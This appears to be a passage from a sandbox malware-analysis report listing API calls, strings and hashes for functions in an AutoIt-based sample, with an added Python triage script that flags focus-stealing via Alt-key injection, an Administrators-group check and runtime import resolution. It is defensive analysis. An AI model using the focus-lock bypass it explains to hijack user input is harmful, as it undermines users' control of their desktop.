                                          • SetForegroundWindow.USER32(?), ref: 00DED685
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DED69B
                                          • GetCurrentThreadId.KERNEL32 ref: 00DED6A2
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DED6AE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DED6BF
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00DED6C7
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00DED6CF
                                          • SetForegroundWindow.USER32(?), ref: 00DED6D2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6E7
                                          • keybd_event.USER32 ref: 00DED6F2
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6FC
                                          • keybd_event.USER32 ref: 00DED701
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED70A
                                          • keybd_event.USER32 ref: 00DED70F
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED719
                                          • keybd_event.USER32 ref: 00DED71E
                                          • SetForegroundWindow.USER32(?), ref: 00DED721
                                          • AttachThreadInput.USER32(?,?,00000000), ref: 00DED748
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          • Opcode ID: 1bd34eb3c9afef9cc90f16f8f48590d98a7f856c3cd4048e33e1aeb36ab2c49e
                                          • Instruction ID: 1b9550fafbe2ef64e03949d8b642a1626669547c6a05e747b5297f92d219af94
                                          • Opcode Fuzzy Hash: 1bd34eb3c9afef9cc90f16f8f48590d98a7f856c3cd4048e33e1aeb36ab2c49e
                                          • Instruction Fuzzy Hash: 14316271A4035CBFEB216B629C4AF7F7E6DEB44B50F104025FA05FA1D1CAB09D01AAA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0D$0E$0F$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG
                                          • API String ID: 0-2078232363
                                          • Opcode ID: 0ebc9ca55ab3c01675b68e81f3901ee8c2529a50873429fcb0a59d3a447153b1
                                          • Instruction ID: 5039a62c7e5356312d0208090b52e631292f7b68a83c1d2d27c001efdaf1d9f5
                                          • Opcode Fuzzy Hash: 0ebc9ca55ab3c01675b68e81f3901ee8c2529a50873429fcb0a59d3a447153b1
                                          • Instruction Fuzzy Hash: 52725E75E0021A9BDB14CF59D880BAEB7B5FF44314F1491AAE849FB291E734DD81CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00DB19FA
                                          • GetSysColor.USER32(0000000F), ref: 00DB1A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00DB1A61
                                            • Part of subcall function 00DB1290: DefDlgProcW.USER32(?,00000020,?), ref: 00DB12D8
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ColorProc$LongWindow
                                          • String ID:
                                          • API String ID: 3744519093-0
                                          • Opcode ID: bf29e2b1a3c5892de99306abc712c4be7a4ff013e448971c5bb30e6b7643be3f
                                          • Instruction ID: 47e490dc720221c713c7bdc9502cd8f698ea88e4127945f6adf0e1dcab79ad40
                                          • Opcode Fuzzy Hash: bf29e2b1a3c5892de99306abc712c4be7a4ff013e448971c5bb30e6b7643be3f
                                          • Instruction Fuzzy Hash: 85A13A75102585FEEA28AB2A5C6DEFF399CDB42351FA8011EF543E5192CA10FD02D6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
                                          • ScreenToClient.USER32 ref: 00DB2374
                                          • GetAsyncKeyState.USER32(00000001), ref: 00DB2399
                                          • GetAsyncKeyState.USER32(00000002), ref: 00DB23A7
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AsyncState$ClientCursorScreen
                                          • String ID:
                                          • API String ID: 4210589936-0
                                          • Opcode ID: 3e71baccb2254c8af5219954cb02364f28ed5492f8af217d74975c14ce7bac6f
                                          • Instruction ID: 759cfd1c93b7b36d5323d238674489f36f502dcb2c77fb86df3661194155673f
                                          • Opcode Fuzzy Hash: 3e71baccb2254c8af5219954cb02364f28ed5492f8af217d74975c14ce7bac6f
                                          • Instruction Fuzzy Hash: 81417335904109FFCF159F69CC48AE9BBB4FB05360F24431AF869A22A0C735AD54DBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00DB4AD0,?,00000000), ref: 00DB4B45
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DB4B57
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 5c472c6848a3d7196948614f5c32314c745c3fa319a70cc0c7d68673d4fe195d
                                          • Instruction ID: 5e7cd892b47fb8afd7951b49946d0783ba24afee60006df377fe1074de672e3a
                                          • Opcode Fuzzy Hash: 5c472c6848a3d7196948614f5c32314c745c3fa319a70cc0c7d68673d4fe195d
                                          • Instruction Fuzzy Hash: 1BD01274E10717CFDB20DF32E81CB46BAD4AF05351F158839D486E6161D770D480C668
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E08774
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E0878B
                                          • FreeSid.ADVAPI32(?), ref: 00E0879B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: ba9f5691e5ef8f980ab9d132decce3d53c6d7fa3a7bf981663181a1dcc2eb84b
                                          • Instruction ID: 6863aeb44c43babc869aa984b9101859d66f122cabf2459154f95c411d341ed8
                                          • Opcode Fuzzy Hash: ba9f5691e5ef8f980ab9d132decce3d53c6d7fa3a7bf981663181a1dcc2eb84b
                                          • Instruction Fuzzy Hash: 1CF04975E1130CBFDF04DFF4DD89AAEBBBCEF08201F1044A9E905E2181E6716A488B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%
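
                                          Three of the functions listed above are worth more than a glance when triaging this listing: the sequence at 00DED6BF-00DED748, where the code attaches its input queue to the foreground window's thread and taps MapVirtualKeyW(0x12), the Alt key (VK_MENU), through keybd_event so that SetForegroundWindow is permitted to steal focus; the pair at 00E08774-00E0879B, whose AllocateAndInitializeSid arguments (count 2, sub-authorities 0x20 and 0x220) rebuild to S-1-5-32-544, BUILTIN\Administrators, which CheckTokenMembership then tests the current token against; and the pair at 00DB4B45-00DB4B57, which resolves GetNativeSystemInfo through LoadLibraryA/GetProcAddress rather than importing it. All three are consistent with the AutoIt runtime the report identifies. The Python below is an added triage example, not code from the Joe Sandbox report or from the sample: it parses entries in the "APIs" format used throughout this listing and applies those three checks. The identifier-authority pointer is printed as "?" in the report, so the SID decoder assumes SECURITY_NT_AUTHORITY (5); the sample input is constructed by concatenating lines copied from those three function listings plus one "Part of subcall" line, so a real run would feed it one function's entries at a time.

```python
"""Triage helper for Joe Sandbox-style 'APIs' function listings (added example)."""
import re

# One entry as the report prints it, e.g.
#   • MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6E7
#   • keybd_event.USER32 ref: 00DED6F2
#   • Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

VK_MENU = 0x12                  # MapVirtualKeyW(0x12): the Alt key
ADMINS_SID = "S-1-5-32-544"     # BUILTIN\Administrators

# Constructed sample: entries copied from three separate functions in the listing.
SAMPLE = """
• GetForegroundWindow.USER32(00000000,?), ref: 00DB48DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DED665
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00DED6BF
• SetForegroundWindow.USER32(?), ref: 00DED6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00DED6E7
• keybd_event.USER32 ref: 00DED6F2
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00DB4AD0,?,00000000), ref: 00DB4B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DB4B57
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E08774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E0878B
• Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623
"""


def parse_apis(text):
    """Return one dict per entry: name, module, args (list of str), ref (int), parent."""
    calls = []
    for m in API_RE.finditer(text):
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"name": m["name"], "module": m["module"], "args": args,
                      "ref": int(m["ref"], 16), "parent": m["parent"]})
    return calls


def hexarg(value):
    """Integer value of a printed hex argument, or None for '?' and string arguments."""
    try:
        return int(value, 16)
    except ValueError:
        return None


def decode_sid(args, authority=5):
    """Rebuild the SID string from AllocateAndInitializeSid's printed arguments.

    Argument layout: (pIdentifierAuthority, nSubAuthorityCount, sub0..sub7, &pSid).
    The authority pointer prints as '?', so the caller supplies it; 5
    (SECURITY_NT_AUTHORITY) is the assumed default.
    """
    count = int(args[1], 16)
    subs = [int(a, 16) for a in args[2:2 + count]]
    return "S-1-%d" % authority + "".join("-%d" % s for s in subs)


def triage(calls):
    """Apply the three checks to one function's parsed entries; return findings by name."""
    by_name = {}
    for c in calls:
        by_name.setdefault(c["name"], []).append(c)
    names = set(by_name)
    findings = {}

    # 1. Foreground-lock bypass: attach to the foreground thread, tap Alt, then
    #    call SetForegroundWindow, which would otherwise be refused.
    alt_taps = [c for c in by_name.get("MapVirtualKeyW", [])
                if c["args"] and hexarg(c["args"][0]) == VK_MENU]
    if {"AttachThreadInput", "SetForegroundWindow", "keybd_event"} <= names and alt_taps:
        findings["focus_steal"] = {"alt_taps": len(alt_taps)}

    # 2. Admin check: build a well-known SID and test the token against it.
    if {"AllocateAndInitializeSid", "CheckTokenMembership"} <= names:
        sid = decode_sid(by_name["AllocateAndInitializeSid"][0]["args"])
        findings["admin_check"] = {"sid": sid, "is_admins_group": sid == ADMINS_SID}

    # 3. Runtime import resolution: symbol names handed to GetProcAddress.
    symbols = [c["args"][1] for c in by_name.get("GetProcAddress", [])
               if len(c["args"]) > 1 and hexarg(c["args"][1]) is None]
    if symbols:
        findings["dynamic_resolution"] = {"symbols": symbols}
    return findings


if __name__ == "__main__":
    for key, value in triage(parse_apis(SAMPLE)).items():
        print(key, value)
```

Entries printed as "Part of subcall function" keep the parent address in `parent`, so a caller can decide whether to attribute a subcall's APIs to the function being triaged or only to the callee; the sample keeps them in the same pool, which is what the report's own "API ID" summary does.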

                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00DEE398), ref: 00E1446A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E1447B
                                          • FindClose.KERNEL32(00000000), ref: 00E1448B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: ee7fd6085e065652f4699451613750255849e271ead3be3450bad15eab084e58
                                          • Instruction ID: 3585bbcdeb2fec3eb005ebec7b8aa5a4cd496a6901b38c29541709c4801dbbf4
                                          • Opcode Fuzzy Hash: ee7fd6085e065652f4699451613750255849e271ead3be3450bad15eab084e58
                                          • Instruction Fuzzy Hash: 6CE02073C10505AF42106B38EC0D8EA7B5C9F05335F100755F836E21F0E7745D8496D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E29468,?,00E3FB84,?), ref: 00E1A097
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E29468,?,00E3FB84,?), ref: 00E1A0A9
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          • Opcode ID: 9e5b3a1d5a57e39ab9274cc9546881d40a6096e2f4069d712044742ebe93ae4b
                                          • Instruction ID: 78855433fe58a921e30b9bab23832cfadff49fd7c82547baa4b2ee0785d9e6a7
                                          • Opcode Fuzzy Hash: 9e5b3a1d5a57e39ab9274cc9546881d40a6096e2f4069d712044742ebe93ae4b
                                          • Instruction Fuzzy Hash: D8F0823550522DEBDB21AFA5CC48FFA776CFF08361F004165F919E6191D6709944CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DD8D57,?,?,?,00000001), ref: 00DDA15A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DDA163
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 0eb0746b939d59aeedf565d32440053b35c0eb4a0b298a62c7f324eed1475b48
                                          • Instruction ID: f42cc8ec042260f591367339f9d523db20d354d0f2eb9090a102c65dee20de75
                                          • Opcode Fuzzy Hash: 0eb0746b939d59aeedf565d32440053b35c0eb4a0b298a62c7f324eed1475b48
                                          • Instruction Fuzzy Hash: 44B0923145420CAFCA002B92EC0DB8A3F68EB45AA2F404020F60D95060CB6254548A91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 418dde24bf2506d71befbedcd052b26f1e315ab56497c172b389ff3c1d362f36
                                          • Instruction ID: 362e5d37ad3d8d058d612d81b01e3d41e6f4c319f6cc48e4e0bea615d7052ad4
                                          • Opcode Fuzzy Hash: 418dde24bf2506d71befbedcd052b26f1e315ab56497c172b389ff3c1d362f36
                                          • Instruction Fuzzy Hash: CA2203316045178BDF288A58C494F7EB7A1FF41344F28806ED982EB5D2DF709DD2EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00E3A630
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E3A661
                                          • GetSysColor.USER32(0000000F), ref: 00E3A66D
                                          • SetBkColor.GDI32(?,000000FF), ref: 00E3A687
                                          • SelectObject.GDI32(?,00000000), ref: 00E3A696
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A6C1
                                          • GetSysColor.USER32(00000010), ref: 00E3A6C9
                                          • CreateSolidBrush.GDI32(00000000), ref: 00E3A6D0
                                          • FrameRect.USER32 ref: 00E3A6DF
                                          • DeleteObject.GDI32(00000000), ref: 00E3A6E6
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00E3A731
                                          • FillRect.USER32 ref: 00E3A763
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E3A78E
                                            • Part of subcall function 00E3A8CA: GetSysColor.USER32(00000012), ref: 00E3A903
                                            • Part of subcall function 00E3A8CA: SetTextColor.GDI32(?,?), ref: 00E3A907
                                            • Part of subcall function 00E3A8CA: GetSysColorBrush.USER32(0000000F), ref: 00E3A91D
                                            • Part of subcall function 00E3A8CA: GetSysColor.USER32(0000000F), ref: 00E3A928
                                            • Part of subcall function 00E3A8CA: GetSysColor.USER32(00000011), ref: 00E3A945
                                            • Part of subcall function 00E3A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E3A953
                                            • Part of subcall function 00E3A8CA: SelectObject.GDI32(?,00000000), ref: 00E3A964
                                            • Part of subcall function 00E3A8CA: SetBkColor.GDI32(?,00000000), ref: 00E3A96D
                                            • Part of subcall function 00E3A8CA: SelectObject.GDI32(?,?), ref: 00E3A97A
                                            • Part of subcall function 00E3A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A999
                                            • Part of subcall function 00E3A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E3A9B0
                                            • Part of subcall function 00E3A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00E3A9C5
                                            • Part of subcall function 00E3A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E3A9ED
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 3521893082-0
                                          • Opcode ID: 3bd353f994607974825263f45f39b6778ef5ffc24ed424b5fa81b219df2c8bf3
                                          • Instruction ID: 627fbbaba8fac39650c61dd8498581e345f63ec0ae9d2e3101a6947156159ea0
                                          • Opcode Fuzzy Hash: 3bd353f994607974825263f45f39b6778ef5ffc24ed424b5fa81b219df2c8bf3
                                          • Instruction Fuzzy Hash: 6B918D72408305BFC7109F65DC4CA6B7FB9FF88321F141A2AF5A2A61A1D771D948CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 00DB2CA2
                                          • DeleteObject.GDI32(00000000), ref: 00DB2CE8
                                          • DeleteObject.GDI32(00000000), ref: 00DB2CF3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00DB2CFE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00DB2D09
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00DEC43B
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00DEC474
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00DEC89D
                                            • Part of subcall function 00DB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB2036,?,00000000,?,?,?,?,00DB16CB,00000000,?), ref: 00DB1B9A
                                          • SendMessageW.USER32(?,00001053), ref: 00DEC8DA
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00DEC8F1
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00DEC907
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00DEC912
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          • Opcode ID: acf2010c09f5f05a1592830bb10754f881c2d5e8d963daf068b258ad81d1f0bc
                                          • Instruction ID: 90ec7a5a6481dc21bf9a47d492c2fa1f0ff801698cffda406eaea00f61112d1b
                                          • Opcode Fuzzy Hash: acf2010c09f5f05a1592830bb10754f881c2d5e8d963daf068b258ad81d1f0bc
                                          • Instruction Fuzzy Hash: 9C128B31610241EFDB25EF25C888BA9BBE1FF05301F585569E896DB262C731E846CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __wcsnicmp$_malloc
                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 2350238924-86951937
                                          • Opcode ID: 0ebc4bc860a5a3716977d97cccf653584485affe70ec1dc6b20c1a4756ce5051
                                          • Instruction ID: 1f603dd871c51acd56765b4576f1c972f49638126f3903ceb9b611691d39ea80
                                          • Opcode Fuzzy Hash: 0ebc4bc860a5a3716977d97cccf653584485affe70ec1dc6b20c1a4756ce5051
                                          • Instruction Fuzzy Hash: A98104B0640305FACF20BB65EC42FFE7768EF05700F084029F946AA296EB65DA55D6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 00E3A903
                                          • SetTextColor.GDI32(?,?), ref: 00E3A907
                                          • GetSysColorBrush.USER32(0000000F), ref: 00E3A91D
                                          • GetSysColor.USER32(0000000F), ref: 00E3A928
                                          • CreateSolidBrush.GDI32(?), ref: 00E3A92D
                                          • GetSysColor.USER32(00000011), ref: 00E3A945
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E3A953
                                          • SelectObject.GDI32(?,00000000), ref: 00E3A964
                                          • SetBkColor.GDI32(?,00000000), ref: 00E3A96D
                                          • SelectObject.GDI32(?,?), ref: 00E3A97A
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00E3A999
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E3A9B0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00E3A9C5
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E3A9ED
                                          • GetWindowTextW.USER32 ref: 00E3AA14
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00E3AA32
                                          • DrawFocusRect.USER32 ref: 00E3AA3D
                                          • GetSysColor.USER32(00000011), ref: 00E3AA4B
                                          • SetTextColor.GDI32(?,00000000), ref: 00E3AA53
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E3AA67
                                          • SelectObject.GDI32(?,00E3A5FA), ref: 00E3AA7E
                                          • DeleteObject.GDI32(?), ref: 00E3AA89
                                          • SelectObject.GDI32(?,?), ref: 00E3AA8F
                                          • DeleteObject.GDI32(?), ref: 00E3AA94
                                          • SetTextColor.GDI32(?,?), ref: 00E3AA9A
                                          • SetBkColor.GDI32(?,?), ref: 00E3AAA4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
